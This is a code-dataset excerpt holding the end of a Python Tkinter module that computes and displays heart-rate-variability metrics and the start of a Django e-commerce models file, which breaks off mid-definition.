Calculating HRV Statistics\n \"\"\"\n def __init__(self, parent, data_dict, preferences):\n Frame.__init__(self, parent)\n self.exp = Exporter(preferences=preferences)\n self.prec = None\n self.frqmeth = None\n self.Outer_freq_dat = None\n self.Rpeak_input = None\n self.DA_dat = None\n self.Outer_DA_dat = None\n self.freq_dat_low = None\n self.parent = parent\n self.pref = preferences\n self.data_dict = data_dict\n self.acc_lbls = ['Sensitivity (%)', 'Positive Predictability (%)', 'Accuracy (%)', 'Detection Error Rate (%)']\n self.poincare_lbls = ['SD1 (ms)', 'SD2 (ms)']\n self.tf_lbls = ['SDNN', 'SDANN', 'MeanRR', 'RMSSD', 'pNN50']\n self.dfa_lbls = []\n self.rqa_lbls = ['DET (%)', 'REC (%)', 'LAM (%)', 'Lmean (bts)', 'Lmax (%)', 'Vmean (bts)', ' Lmax (%)']\n self.text, self.subheader, self.subheadernb, self.header = headerStyles(self.pref['values']['font'],\n self.pref['values']['base_font_size'])\n self.plot_wind = None\n self.parent.title(\"Algorithm and HRV Metrics\")\n self.parent.resizable(width=FALSE, height=FALSE)\n self.parent.configure(highlightthickness=1, highlightbackground='grey')\n self.stats()\n\n @staticmethod\n def __remove_doubles(x, y=None):\n\n x = x.reshape(-1, )\n temp = np.append(np.diff(x), 1)\n x = x[temp != 0]\n\n if y is None:\n return x.reshape(-1, 1)\n else:\n y = y.reshape(-1, )\n y = y[temp != 0]\n return x.reshape(-1, 1), y.reshape(-1, 1)\n\n def stats(self):\n but_wtd = 20\n Fs = self.data_dict['Fs']\n\n if len(self.data_dict['R_t']) <= 1 & self.pref['values']['warnings_on']:\n messagebox.showwarning(\"Warning\", \"Cannot calculate HRV metrics \\n\\nPlease note: Annotations must be \"\n \"present for HRV metrics to be calculated.\")\n else:\n if self.pref['values']['ECG_pref_on']:\n # Removes any accidental double-ups created during editing and sets metrics to be calculated based\n # on which plot is present\n if self.data_dict['plot_pred'] == 1:\n R_t, tR_amp = self.__remove_doubles(self.data_dict['R_t'], self.data_dict['R_amp'])\n Rpeakss = R_t\n else:\n tR_t, tR_amp = self.__remove_doubles(self.data_dict['True_R_t'], self.data_dict['True_R_amp'])\n Rpeakss = tR_amp\n # WORK OUT HOW TO DRAW LATER\n # draw1()\n\n else:\n R_t = self.__remove_doubles(self.data_dict['R_t'])\n Rpeakss = R_t\n\n # Frame Parameters\n data_frame = Frame(master=self.parent)\n data_frame.pack()\n time_dat = Frame(master=data_frame)\n time_dat.pack(side='left', anchor='n')\n self.Outer_freq_dat = Frame(master=data_frame)\n self.Outer_freq_dat.pack(side='left', anchor='n')\n freq_dat_up = Frame(self.Outer_freq_dat)\n freq_dat_up.pack(side='top')\n self.freq_dat_low = Frame(self.Outer_freq_dat)\n self.freq_dat_low.pack(side='top')\n non_dat = Frame(master=data_frame)\n non_dat.pack(side='left', anchor='n')\n self.Outer_DA_dat = Frame(master=data_frame)\n self.Outer_DA_dat.pack(side='left', anchor='n')\n self.DA_dat = Frame(master=self.Outer_DA_dat)\n self.DA_dat.pack(side='top', anchor='n')\n\n # TIME-DOMAIN Parameters\n time_domain = Calculate_Features(Rpeakss, Fs)\n Label(time_dat, text=\"Time-Domain Parameters\", anchor=TKc.W, font=self.text).grid(row=0, column=0,\n columnspan=2)\n\n for i, dat in enumerate(time_domain):\n self.__add_paired_label(time_dat, self.tf_lbls[i], dat, row=i+1)\n\n Label(time_dat, text=\"\", anchor=TKc.W, width=int(but_wtd / 4)).grid(row=5, column=2) # SPACER\n\n # FREQUENCY-DOMAIN Parameters\n Label(freq_dat_up, text=\"Frequency-Domain Parameters\", anchor=TKc.W, font=self.text).pack(side='top',\n anchor='center')\n\n # Frequency-domain Statistics\n self.Rpeak_input = Rpeakss / Fs\n\n # MENU FOR CHOICE OF ANALYSIS title_list =\n self.frqmeth = StringVar(freq_dat_up)\n options = ['Welch', 'Blackman-Tukey', 'LombScargle', 'Auto Regression']\n RRImenu = OptionMenu(freq_dat_up, self.frqmeth, options[0], *options)\n RRImenu.config(width=16)\n # RRImenu.configure(compound='right',image=self.photo)\n RRImenu.pack(side='top')\n\n self.frqmeth.trace('w', self.change_dropdown_HRV)\n self.__print_freq(but_wtd, method=1)\n\n # NON-LINEAR Parameters\n RRI = np.diff(self.Rpeak_input)\n rqa_ = RQA(RRI)\n pc_ = Poincare(RRI)\n dfa_ = DFA(RRI)\n self.__print_non_linear(non_dat, rqa_, pc_, dfa_, but_wtd)\n\n if self.pref['values']['loaded_ann'] == 1:\n self.prec = None\n try:\n tR_t, tR_amp = self.__remove_doubles(self.data_dict['True_R_t'], self.data_dict['True_R_amp'])\n self.__print_acc(tR_t, tR_amp, but_wtd)\n except KeyError:\n raise Warning('Can\\'t access true peaks. Check true R locations are loaded')\n\n else:\n tR_t = None\n\n Button(self.parent, text=\"Save\", width=int(but_wtd / 2), height=2,\n command=self.exp.savemetrics(Rpeakss, Fs, tR_t, td=time_domain, rqa=rqa_, dfa=dfa_, pc=pc_),\n font='Helvetica 12 bold').pack(side='bottom', anchor='e')\n\n self.__open_plot()\n\n # NONLINEAR Parameters\n def __print_non_linear(self, df, rqa, pc, dfa, bw, fnt='Helvetica 10 bold'):\n \"\"\"\n\n :param df: Dataframe.\n :param rqa: RQA parameters\n :param pc: Poincare parameters\n :param dfa: DFA parameters\n :param bw: Button Width\n :param fnt: Font for subtitles\n :return:\n \"\"\"\n Label(df, text=\"Nonlinear Parameters\", anchor=TKc.W, font=self.text).grid(row=0, column=0, columnspan=4)\n\n Label(df, text=\"Recurrence Analysis\", anchor=TKc.W, width=bw, font=fnt).grid(row=1, column=0, columnspan=2)\n for i, dat in enumerate(rqa):\n self.__add_paired_label(df, self.rqa_lbls[i], dat, row=i + 2, col=0)\n\n Label(df, text=\"Poincare Analysis\", anchor=TKc.W, width=bw, font=fnt).grid(row=1, column=2, columnspan=2)\n for i, dat in enumerate(pc):\n self.__add_paired_label(df, self.poincare_lbls[i], dat, row=i + 2, col=2)\n\n Label(df, text=\"DFA\", anchor=TKc.W, width=bw, font=fnt).grid(row=5, column=2, columnspan=2)\n for i, dat in enumerate(dfa[:2]):\n self.__add_paired_label(df, self.dfa_lbls[i], dat, row=i + 6, col=2)\n\n def __print_acc(self, pks, true_pks, bw, tt: int = None):\n if tt is None:\n tt = self.pref['values']['tt']\n\n TP, FP, FN = test2(pks, true_pks, tt)\n Se, PP, ACC, DER = acc2(TP, FP, FN)\n\n Label(self.DA_dat, text=\"Detection Algorithm Metrics\", anchor=TKc.W, font=self.text).grid(row=3, column=13,\n columnspan=4)\n for i, dat in enumerate([Se, PP, ACC, DER]):\n self.__add_paired_label(self.DA_dat, self.acc_lbls[i], dat, row=i+4, col=13)\n\n Label(self.DA_dat, text=\"Precision Window (ms)\", anchor=TKc.W).grid(row=8, column=13)\n self.prec = Entry(self.DA_dat, width=int(bw / 2))\n self.prec.grid(row=8, column=14)\n time = self.data_dict['Fs'] / self.data_dict['Fs'] * 1000\n self.prec.insert(0, '{:.2f}'.format(time))\n Button(self.DA_dat, text=\"Update\", anchor=TKc.W, width=int(bw / 2),\n command=lambda: self.updateprec(pks, true_pks, bw)).grid(row=8, column=15)\n\n def updateprec(self, pks, true_pks, but_wtd):\n self.DA_dat.destroy()\n self.DA_dat = Frame(master=self.Outer_DA_dat)\n self.DA_dat.pack(side='top')\n self.__print_acc(pks, true_pks, but_wtd, round(float(self.prec.get()) * self.data_dict['Fs'] / 1000))\n\n def change_dropdown_HRV(self, *args):\n methods = self.frqmeth.get()\n\n if methods == 'Welch':\n METH = 1\n elif methods == 'Blackman-Tukey':\n METH = 2\n elif methods == 'LombScargle':\n METH = 3\n else:\n METH = 4\n\n self.__print_freq(but_wtd=20, method=METH)\n\n def __print_freq(self, but_wtd, method):\n self.freq_dat_low.destroy()\n self.freq_dat_low = Frame(master=self.Outer_freq_dat)\n self.freq_dat_low.pack(side='top')\n\n def _gen_label(txt, w, r_, c_):\n Label(self.freq_dat_low, text=txt, anchor=TKc.W, width=w).grid(row=r_, column=c_)\n\n fq_vals = Freq_Analysis(self.Rpeak_input, meth=method, decim=3, m=self.pref['values']['welch_L'],\n o=self.pref['values']['welch_O'], bt_val=self.pref['values']['bltk_input'],\n omega_max=self.pref['values']['ls_omega_max'], order=self.pref['values']['ar_order'])\n\n txt__ = ['VLF (Hz)', str(fq_vals[6]), 'LF (Hz)', fq_vals[7], 'HF (Hz)', fq_vals[8]]\n w1, w2 = int(but_wtd / 4 * 3), int(but_wtd / 2)\n\n _gen_label(txt='Peak Frequency', w=w1, r_=1, c_=0)\n c, r = 1, 1\n for i in [0, 2, 4]:\n for j in range(2):\n _gen_label(txt=txt__[i+j], w=w2, r_=r+j, c_=c)\n c += 1\n\n txt__ = ['VLF (%)', str(fq_vals[3]), 'LF (%)', fq_vals[4], 'HF (%)', fq_vals[5]]\n _gen_label(txt='Percentage Power', w=w1, r_=3, c_=0)\n c, r = 1, 3\n for i in [0, 2, 4]:\n for j in range(2):\n _gen_label(txt=txt__[i+j], w=w2, r_=r+j, c_=c)\n c += 1\n\n txt__ = ['VLF (ms^2)', str(fq_vals[0]), 'LF (ms^2)', fq_vals[1], 'HF (ms^2)', fq_vals[2]]\n _gen_label(txt='Absolute Power', w=w1, r_=5, c_=0)\n c, r = 1, 5\n for i in [0, 2, 4]:\n for j in range(2):\n _gen_label(txt=txt__[i+j], w=w2, r_=r+j, c_=c)\n c += 1\n\n Label(self.freq_dat_low, text=\"Peak Frequency\", anchor=TKc.W, width=w1).grid(row=1, column=0)\n\n def __open_plot(self):\n # Change data from none\n dat = None\n\n if self.plot_wind is not None:\n self.plot_wind.destroy()\n self.plot_wind = Toplevel()\n self.pv = PlotViewer(self.plot_wind, dat, self.pref)\n self.plot_wind.bind('', self.__close_plot_viewer)\n\n def __close_plot_viewer(self):\n # TODO - check if this works\n self.pv.close()\n\n def __add_paired_label(self, dframe, txt, value, row, col: int = 0, bw: int = 20):\n \"\"\"\n\n :param dframe:\n :param txt:\n :param value:\n :param row:\n :param col:\n :param bw:\n :return:\n \"\"\"\n Label(dframe, text=txt, anchor=TKc.W, width=bw, font=self.text).grid(row=row, column=col)\n Label(dframe, text=value, anchor=TKc.W, width=int(bw / 2), font=self.text).grid(row=row, column=col + 1)\n","repo_name":"drmegmcconnell/RRAPET","sub_path":"utils/HRV_Statistics.py","file_name":"HRV_Statistics.py","file_ext":"py","file_size_in_byte":12022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36921977728","text":"import re\nimport pytz\n\nfrom mptt.models import MPTTModel, TreeForeignKey\nfrom mptt.querysets import TreeQuerySet\nfrom mptt.managers import TreeManager\n\nfrom decimal import Decimal\nfrom datetime import datetime\nfrom cms.models import CMSPlugin\nfrom colorfield.fields import ColorField\nfrom polymorphic.query import PolymorphicQuerySet\n\nfrom cms.models import Page\n\nfrom filer.fields import image\nfrom filer.fields.file import FilerFileField\n\nfrom parler.fields import TranslatedField\nfrom parler.managers import TranslatableManager, TranslatableQuerySet\nfrom parler.models import TranslatableModel, TranslatableModelMixin\nfrom parler.models import TranslatedFieldsModel, TranslatedFields\n\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.contrib import sites\nfrom django.core.validators import MinValueValidator\nfrom djangocms_text_ckeditor.fields import HTMLField\nfrom django.utils.six.moves.urllib.parse import urljoin\nfrom django.utils.translation import ugettext_lazy as _\nfrom autoslug import AutoSlugField\n\nfrom shop.money import Money, MoneyMaker\nfrom shop.money.fields import MoneyField\nfrom shop.models.address import BaseShippingAddress, BaseBillingAddress\nfrom shop.models.customer import CustomerModel\nfrom shop.models.defaults.cart import Cart\nfrom shop.models.defaults.cart_item import CartItem\nfrom shop.models.defaults.customer import Customer\nfrom shop.models.defaults.mapping import ProductPage, ProductImage\nfrom shop.models.defaults.order import Order\nfrom shop.models.fields import JSONField\nfrom shop.models.order import BaseOrderItem\nfrom shop.models.product import BaseProduct, BaseProductManager\nfrom shop.models.product import AvailableProductMixin\n\nfrom .utils import get_apply_discountpercategory\nfrom shop.models.delivery import BaseDelivery, BaseDeliveryItem\n\n\ntry:\n from apps.dmRabais.models import dmRabaisPerCategory\n from apps.dmRabais.models import dmPromoCode\n from apps.dmRabais.models import dmCustomerPromoCode\nexcept Exception as e:\n print(e)\n dmRabaisPerCategory = None\n dmPromoCode = None\n dmCustomerPromoCode = None\n\n__all__ = [\"Cart\", \"CartItem\", \"Order\", \"Customer\"]\n\nTAG_RE = re.compile(r\"<[^>]+>\")\n\n\nclass Delivery(BaseDelivery):\n class Meta:\n get_latest_by = [\"pk\"]\n\n\nclass DeliveryItem(BaseDeliveryItem):\n quantity = models.PositiveIntegerField(\n _(\"Ordered Quantity\")\n )\n\n class Meta:\n get_latest_by = [\"pk\"]\n\n\nclass OrderItem(BaseOrderItem):\n quantity = models.PositiveIntegerField(\n _(\"Ordered Quantity\")\n )\n variables = JSONField(\n verbose_name=_(\"Data\")\n )\n\n canceled = models.BooleanField(\n verbose_name=_(\"Canceled\"),\n default=False\n )\n\n def populate_from_cart_item(self, cart_item, request):\n super().populate_from_cart_item(cart_item, request)\n self.variables = cart_item.extra\n self.save()\n\n\nclass CMSPageReferenceMixin(object):\n category_fields = [\"cms_pages\"]\n\n def get_absolute_url(self):\n page = Page.objects.filter(reverse_id=\"produits\").first()\n if page is not None:\n return page.get_absolute_url()\n return \"\"\n\n\nclass ProductQuerySet(TranslatableQuerySet, PolymorphicQuerySet):\n pass\n\n\nclass ProductManager(BaseProductManager, TranslatableManager):\n queryset_class = ProductQuerySet\n\n def get_queryset(self):\n qs = self.queryset_class(self.model, using=self._db)\n return qs.prefetch_related(\"translations\")\n\n\n#######################################################################\n# Adresses\n#######################################################################\n\nCOUNTRIES_FR = [\n ('AF', _('Afghanistan')), ('ZA', _('Afrique du Sud')),\n ('AL', _('Albanie')), ('DZ', _('Algérie')),\n ('DE', _('Allemagne')), ('AD', _('Andorre')),\n ('AO', _('Angola')), ('AG', _('Antigua-et-Barbuda')),\n ('SA', _('Arabie saoudite')), ('AR', _('Argentine')),\n ('AM', _('Arménie')), ('AU', _('Australie')),\n ('AT', _('Autriche')), ('AZ', _('Azerbaïdjan')),\n ('BS', _('Bahamas')), ('BH', _('Bahreïn')),\n ('BD', _('Bangladesh')), ('BB', _('Barbade')),\n ('BY', _('Biélorussie')), ('BE', _('Belgique')),\n ('BZ', _('Belize')), ('BJ', _('Bénin')), ('BT', _('Bhoutan')),\n ('BO', _('Bolivie')), ('BA', _('Bosnie-Herzégovine')),\n ('BW', _('Botswana')), ('BR', _('Brésil')),\n ('BN', _('Brunei')), ('BG', _('Bulgarie')),\n ('BF', _('Burkina Faso')), ('BI', _('Burundi')),\n ('KH', _('Cambodge')), ('CM', _('Cameroun')),\n ('CA', _('Canada')), ('CV', _('Cap-Vert')),\n ('CF', _('République centrafricaine')), ('CL', _('Chili')),\n ('CN', _('Chine')), ('CY', _('Chypre (pays)')),\n ('CO', _('Colombie')), ('KM', _('Comores (pays)')),\n ('CG', _('République du Congo')),\n ('CD', _('République démocratique du Congo')),\n ('KR', _('Corée du Sud')), ('KP', _('Corée du Nord')),\n ('CR', _('Costa Rica')), ('CI', _(\"Côte d'Ivoire\")),\n ('HR', _('Croatie')), ('CU', _('Cuba')), ('DK', _('Danemark')),\n ('DJ', _('Djibouti')), ('DO', _('République dominicaine')),\n ('DM', _('Dominique')), ('EG', _('Égypte')),\n ('SV', _('Salvador')), ('AE', _('Émirats arabes unis')),\n ('EC', _('Équateur (pays)')), ('ER', _('Érythrée')),\n ('ES', _('Espagne')), ('EE', _('Estonie')),\n ('US', _('États-Unis')), ('ET', _('Éthiopie')),\n ('FJ', _('Fidji')), ('FI', _('Finlande')), ('FR', _('France')),\n ('GA', _('Gabon')), ('GM', _('Gambie')),\n ('GE', _('Géorgie (pays)')), ('GH', _('Ghana')),\n ('GR', _('Grèce')), ('GD', _('Grenade (pays)')),\n ('GT', _('Guatemala')), ('GN', _('Guinée')),\n ('GW', _('Guinée-Bissau')), ('GQ', _('Guinée équatoriale')),\n ('GY', _('Guyana')), ('HT', _('Haïti')), ('HN', _('Honduras')),\n ('HU', _('Hongrie')),\n ('IN', _('Inde')), ('ID', _('Indonésie')), ('IR', _('Iran')),\n ('IQ', _('Irak')), ('IE', _('Irlande (pays)')),\n ('IS', _('Islande')), ('IL', _('Israël')), ('IT', _('Italie')),\n ('JM', _('Jamaïque')),\n ('JP', _('Japon')), ('JO', _('Jordanie')),\n ('KZ', _('Kazakhstan')), ('KE', _('Kenya')),\n ('KG', _('Kirghizistan')), ('KI', _('Kiribati')),\n ('KW', _('Koweït')), ('LA', _('Laos')), ('LS', _('Lesotho')),\n ('LV', _('Lettonie')), ('LB', _('Liban')),\n ('LR', _('Liberia')), ('LY', _('Libye')),\n ('LI', _('Liechtenstein')), ('LT', _('Lituanie')),\n ('LU', _('Luxembourg (pays)')), ('MK', _('Macédoine du Nord')),\n ('MG', _('Madagascar')), ('MY', _('Malaisie')),\n ('MW', _('Malawi')), ('MV', _('Maldives')), ('ML', _('Mali')),\n ('MT', _('Malte')), ('MA', _('Maroc')),\n ('MH', _('Îles Marshall (pays)')), ('MU', _('Maurice (pays)')),\n ('MR', _('Mauritanie')), ('MX', _('Mexique')),\n ('FM', _('États fédérés de Micronésie (pays)')),\n ('MD', _('Moldavie')), ('MC', _('Monaco')),\n ('MN', _('Mongolie')), ('ME', _('Monténégro')),\n ('MZ', _('Mozambique')), ('MM', _('Birmanie')),\n ('NA', _('Namibie')), ('NR', _('Nauru')), ('NP', _('Népal')),\n ('NI', _('Nicaragua')), ('NE', _('Niger')), ('NG', _('Nigeria')),\n ('NO', _('Norvège')), ('NZ', _('Nouvelle-Zélande')),\n ('OM', _('Oman')), ('UG', _('Ouganda')),\n ('UZ', _('Ouzbékistan')), ('PK', _('Pakistan')),\n ('PW', _('Palaos')), ('PA', _('Panama')),\n ('PG', _('Papouasie-Nouvelle-Guinée')), ('PY', _('Paraguay')),\n ('NL', _('Pays-Bas')), ('PE', _('Pérou')),\n ('PH', _('Philippines')), ('PL', _('Pologne')),\n ('PT', _('Portugal')), ('QA', _('Qatar')), ('RO', _('Roumanie')),\n ('GB', _('Royaume-Uni')), ('RU', _('Russie')),\n ('RW', _('Rwanda')), ('KN', _('Saint-Christophe-et-Niévès')),\n ('SM', _('Saint-Marin')),\n ('VC', _('Saint-Vincent-et-les-Grenadines')),\n ('LC', _('Sainte-Lucie')), ('SB', _('Salomon')),\n ('WS', _('Samoa')), ('ST', _('Sao Tomé-et-Principe')),\n ('SN', _('Sénégal')), ('RS', _('Serbie')),\n ('SC', _('Seychelles')), ('SL', _('Sierra Leone')),\n ('SG', _('Singapour')), ('SK', _('Slovaquie')),\n ('SI', _('Slovénie')), ('SO', _('Somalie')), ('SD', _('Soudan')),\n ('SS', _('Soudan du Sud')), ('LK', _('Sri Lanka')),\n ('SE', _('Suède')), ('CH', _('Suisse')), ('SR', _('Suriname')),\n ('SZ', _('Eswatini')), ('SY', _('Syrie')),\n ('TJ', _('Tadjikistan')), ('TZ', _('Tanzanie')),\n ('TD', _('Tchad')), ('CZ', _('Tchéquie')),\n ('TH', _('Thaïlande')), ('TL', _('Timor oriental')),\n ('TG', _('Togo')), ('TO', _('Tonga')),\n ('TT', _('Trinité-et-Tobago')), ('TN', _('Tunisie')),\n ('TM', _('Turkménistan')), ('TR', _('Turquie')),\n ('TV', _('Tuvalu')), ('UA', _('Ukraine')), ('UY', _('Uruguay')),\n ('VU', _('Vanuatu')), ('VE', _('Venezuela')),\n ('VN', _('Viêt Nam')), ('YE', _('Yémen')), ('ZM', _('Zambie')),\n ('ZW', _('Zimbabwe'))\n]\n\n\nclass ShippingAddress(BaseShippingAddress):\n \"\"\"\n Customer's shipping address.\n \"\"\"\n\n name = models.CharField(\n _(\"Fullname\"),\n max_length=1024\n )\n address1 = models.CharField(\n _(\"Address 1\"),\n max_length=1024\n )\n address2 = models.CharField(\n _(\"Address 2\"),\n max_length=1024,\n blank=True,\n null=True\n )\n country = models.CharField(\n _(\"Country\"),\n max_length=4\n )\n province = models.CharField(\n _(\"Province / State\"),\n max_length=1024\n )\n city = models.CharField(\n _(\"City\"),\n max_length=1024\n )\n zip_code = models.CharField(\n _(\"Postal Code\"),\n max_length=255\n )\n\n class Meta:\n verbose_name = _(\"Shipping Address\")\n verbose_name_plural = _(\"Shipping Addresses\")\n\n def get_country_display(self):\n result = self.country\n for item in COUNTRIES_FR:\n if self.country in item[0]:\n result = item[1]\n return result\n\n\nclass BillingAddress(BaseBillingAddress):\n \"\"\"\n Customer's billing address.\n \"\"\"\n\n name = models.CharField(\n _(\"Fullname\"),\n max_length=1024\n )\n address1 = models.CharField(\n _(\"Address 1\"),\n max_length=1024\n )\n address2 = models.CharField(\n _(\"Address 2\"),\n max_length=1024,\n blank=True,\n null=True\n )\n country = models.CharField(\n _(\"Country\"),\n max_length=4\n )\n province = models.CharField(\n _(\"Province / State\"),\n max_length=1024\n )\n city = models.CharField(\n _(\"City\"),\n max_length=1024\n )\n zip_code = models.CharField(\n _(\"Postal Code\"),\n max_length=255\n )\n\n class Meta:\n verbose_name = _(\"Billing Address\")\n verbose_name_plural = _(\"Billing Addresses\")\n\n def get_country_display(self):\n result = self.country\n for item in COUNTRIES_FR:\n if self.country in item[0]:\n result = item[1]\n return result\n\n\n#######################################################################\n# Produit: Catégorie/Filtres\n#######################################################################\n\n# To user MPTT and Parler, need to overwrite Queryset\nclass CategoryQuerySet(TranslatableQuerySet, TreeQuerySet):\n\n def as_manager(cls):\n manager = CategoryManager.from_queryset(cls)()\n manager._built_with_as_manager = True\n return manager\n as_manager.queryset_only = True\n as_manager = classmethod(as_manager)\n\n\n# Need to create own CategoryManager\nclass CategoryManager(TreeManager, TranslatableManager):\n _queryset_class = CategoryQuerySet\n\n\nclass ProductCategory(CMSPageReferenceMixin, MPTTModel, TranslatableModel):\n \"\"\"\n A model to help to categorize products.\n Product can have multiple categories.\n \"\"\"\n\n CHOIX_POS = [\n (1, _(\"Left\")),\n (2, _(\"Center\")),\n (3, _(\"Right\"))\n ]\n\n name = models.CharField(\n verbose_name=_(\"Category's Name\"),\n max_length=255,\n null=False,\n blank=False,\n help_text=_(\"Maximum 255 characters.\")\n )\n name_trans = TranslatedField()\n parent = TreeForeignKey(\n \"self\",\n on_delete=models.CASCADE,\n verbose_name=_(\"Parent's Category\"),\n related_name='children',\n blank=True,\n null=True\n )\n square_id = models.CharField(\n verbose_name=_(\"Square ID\"),\n max_length=30,\n null=True,\n blank=True\n )\n order = models.PositiveSmallIntegerField(\n verbose_name=_(\"Sort by\"),\n default=0,\n blank=False,\n null=False\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True,\n help_text=_(\n \"A text that will be shown on the top of \\\n the page of the Products of this category.\"\n )\n )\n text_position = models.PositiveSmallIntegerField(\n verbose_name=_(\"Position\"),\n choices=CHOIX_POS,\n default=1,\n help_text=_(\"Position of the text.\")\n )\n text_color = ColorField(\n verbose_name=_(\"Text's Colour\"),\n null=True,\n blank=True\n )\n bg_color = ColorField(\n verbose_name=_(\"Background's Colour\"),\n null=True,\n blank=True\n )\n image = image.FilerImageField(\n verbose_name=_(\"Header's Image\"),\n on_delete=models.SET_NULL,\n related_name=\"category_image\",\n null=True,\n blank=True,\n help_text=_(\n \"Size: 2000x900.\\\n An image that will be shown on the top of the page of\\\n the Products of this category.\"\n )\n )\n\n active = models.BooleanField(\n verbose_name=_(\"Active\"),\n default=True\n )\n\n objects = CategoryManager()\n\n class Meta:\n verbose_name = _(\"Product's Category\")\n verbose_name_plural = _(\"Product's Categories\")\n\n class MPTTMeta:\n level_attr = 'mptt_level'\n order_insertion_by = ['name']\n\n def __str__(self):\n if self.parent is not None:\n if self.parent.parent is not None:\n return self.parent.parent.name + \" | \" + \\\n self.parent.name + \" | \" + self.name\n else:\n return self.parent.name + \" | \" + self.name\n else:\n return self.name\n\n def get_products(self):\n result = Product.objects.filter(\n Q(categories=self) | Q(categories__parent=self)\n | Q(categories__parent__parent=self)\n | Q(categories__parent__parent__parent=self),\n active=True).order_by(\"id\")\n return result\n\n def get_absolute_url(self):\n name = \"-\".join(self.name.lower().split(' '))\n if self.get_current_language() == \"en\":\n return urljoin(\"/en/products/category/\", str(self.id) + '-' + name)\n return urljoin(\"/fr/produits/category/\", str(self.id) + '-' + name)\n\n\nclass ProductCategoryTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of Product Category\n \"\"\"\n\n master = models.ForeignKey(\n ProductCategory,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n name_trans = models.CharField(\n verbose_name=_(\"Translated Category Name\"),\n max_length=255,\n help_text=_(\"Maximum 255 characters.\")\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\nclass ProductFilterGroup(TranslatableModel):\n\n name = models.CharField(\n verbose_name=_(\"Filter's Group Name\"),\n max_length=255,\n null=False,\n blank=False,\n help_text=_(\"Maximum 255 characters.\")\n )\n name_trans = TranslatedField()\n order = models.PositiveSmallIntegerField(\n verbose_name=_(\"Sort by\"),\n default=0,\n blank=False,\n null=False\n )\n\n class Meta:\n verbose_name = _(\"Product's Filter Group\")\n verbose_name_plural = _(\"Product's Filter Groups\")\n ordering = [\"order\", \"name\"]\n\n def __str__(self):\n return self.name\n\n\nclass ProductFilterGroupTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of ProductFilterGroup\n \"\"\"\n\n master = models.ForeignKey(\n ProductFilterGroup,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n name_trans = models.CharField(\n verbose_name=_(\"Translated Filter's Group Name\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\nclass ProductFilter(TranslatableModel):\n \"\"\"\n A model to help to filter products.\n Product can have multiple filters.\n \"\"\"\n group = models.ForeignKey(\n ProductFilterGroup,\n on_delete=models.SET_NULL,\n verbose_name=_(\"Filter Group\"),\n blank=True,\n null=True,\n help_text=_(\"Add a group to Filter.\")\n )\n name = models.CharField(\n verbose_name=_(\"Filter's Name\"),\n max_length=255,\n null=False,\n blank=False,\n help_text=_(\"Maximum 255 characters.\")\n )\n name_trans = TranslatedField()\n image = image.FilerImageField(\n verbose_name=_(\"image\"),\n related_name=\"filter_image\",\n on_delete=models.SET_NULL,\n null=True,\n blank=True,\n help_text=_(\"Size: 2000x900.\\\n An image that will be shown on the top of the page of\\\n the Products of this filter.\")\n )\n order = models.PositiveSmallIntegerField(\n verbose_name=_(\"Sort by\"),\n default=0,\n blank=False,\n null=False\n )\n\n class Meta:\n verbose_name = _(\"Product's Filter\")\n verbose_name_plural = _(\"Product's Filters\")\n ordering = [\"group\", \"order\", \"-pk\"]\n\n def __str__(self):\n if self.group:\n return self.group.name + \" : \" + self.name\n return self.name\n\n\nclass ProductFilterTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of ProductFilter\n \"\"\"\n\n master = models.ForeignKey(\n ProductFilter,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n name_trans = models.CharField(\n verbose_name=_(\"Translated Filter's Name\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n description = models.TextField(\n null=True, blank=True\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\nclass ProductBrand(models.Model):\n \"\"\"\n A model to help to brands products.\n Product can only have one brand.\n \"\"\"\n\n name = models.CharField(\n verbose_name=_(\"Brand's Name\"),\n max_length=255,\n null=False,\n blank=False,\n help_text=_(\"Maximum 255 characters.\")\n )\n logo = image.FilerImageField(\n verbose_name=_(\"Logo\"),\n related_name=\"brand_logo\",\n on_delete=models.SET_NULL,\n blank=True,\n null=True,\n help_text=_(\"Size: 300x300.\")\n )\n order = models.PositiveSmallIntegerField(\n verbose_name=_(\"Sort by\"),\n default=0,\n blank=False,\n null=False\n )\n\n class Meta:\n verbose_name = _(\"Product's Brand\")\n verbose_name_plural = _(\"Product's Brands\")\n ordering = [\"order\", \"name\"]\n\n def __str__(self):\n return self.name\n\n def get_products(self):\n result = Product.objects.filter(\n brand=self,\n active=True\n ).order_by(\"id\")\n return result\n\n\nclass ProductLabel(TranslatableModel):\n \"\"\"\n A model to add a custom label\n on product's media.\n \"\"\"\n\n name = TranslatedField()\n colour = ColorField(\n verbose_name=_(\"Text's Colour\"),\n default=\"#000\",\n null=False,\n blank=False\n )\n bg_colour = ColorField(\n verbose_name=_(\"Background's Colour\"),\n default=\"#fff\",\n null=False,\n blank=False\n )\n\n class Meta:\n verbose_name = _(\"Product's Label\")\n verbose_name_plural = _(\"Product's Labels\")\n ordering = [\"-pk\"]\n\n def __str__(self):\n try:\n if self.name:\n return self.name\n return str(self.pk)\n except Exception:\n return str(self.pk)\n\n\nclass ProductLabelTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of ProductLabel\n \"\"\"\n\n master = models.ForeignKey(\n ProductLabel,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n name = models.CharField(\n verbose_name=_(\"Label's Name\"),\n max_length=25,\n null=False,\n blank=False,\n help_text=_(\"Maximum 25 characters.\")\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\n#######################################################################\n# Produits\n#######################################################################\n\n\nclass Product(CMSPageReferenceMixin, TranslatableModelMixin, BaseProduct):\n \"\"\"\n A basic model to handle polymorphic Product\n \"\"\"\n product_name = 